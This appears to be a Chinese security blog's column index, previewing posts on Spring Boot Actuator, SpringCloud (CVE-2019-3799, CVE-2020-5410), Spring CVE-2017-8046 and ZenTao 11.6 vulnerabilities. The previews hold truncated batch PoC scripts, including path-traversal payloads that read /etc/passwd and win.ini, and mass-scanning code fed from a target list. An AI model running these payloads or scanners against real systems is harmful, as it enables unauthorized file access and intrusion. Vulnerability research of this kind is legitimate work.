漏洞收录
文章平均质量分 53
漏洞收录
心如熊猫
Expecto Patronum!
展开
-
Spring Boot Actuator 漏洞利用
漏洞检测:spring存在目录:/jolokia/list并且返回的json中有“reloadByURL”关于路径问题:1.x版本的在根路径下注册路由,2.x版本则需要加/actuator/写个批量脚本检测一下import threadingimport argparseimport requestsimport queuedef readfile(): with open('fofa_spring.txt', 'r') as f: for i in f.read原创 2021-04-29 10:03:54 · 2036 阅读 · 0 评论 -
SpringCloud CVE_2019_3799--CVE_2020_5410 批量poc
import requestsimport argparseimport reCVE_2019_3799_win = r'/aaa/bbb/master/..%252F..%252F..%252F..%252F..%252F..%252Fwindows/win.ini'CVE_2019_3799_linux = r'/foo/default/master/..%252F..%252F..%252F..%252Fetc%252fpasswd'CVE_2020_5410_linux = r'/..原创 2021-04-17 07:35:15 · 826 阅读 · 2 评论 -
spring CVE-2017-8046 POC
为了练习 argparse 库import requestsimport jsonimport base64import argparsedef Option_Check(i, headers, payload): try: r = requests.options(i, timeout=0.5) if r.status_code == 200: r = r.text if r.find('patch'):原创 2021-04-15 04:49:55 · 455 阅读 · 0 评论 -
禅道 11.6版本 后台漏洞 复现和审计
文章目录查看版本漏洞sql注入任意文件读取rce禅道 11.6版本下载地址本次复现环境windows先搞清楚禅道参数的传递方式,进入index.php慢慢看先发现了这个语句:这个导致禅道的查看版本信息的漏洞 跟进看一下查看版本漏洞复现payload:http://ip/zentao/index.php?mode=getconfig跟进exportConfig()文件位置:zentao\framework\router.class.php调用父类的exportConfig()原创 2021-04-04 22:02:17 · 2910 阅读 · 0 评论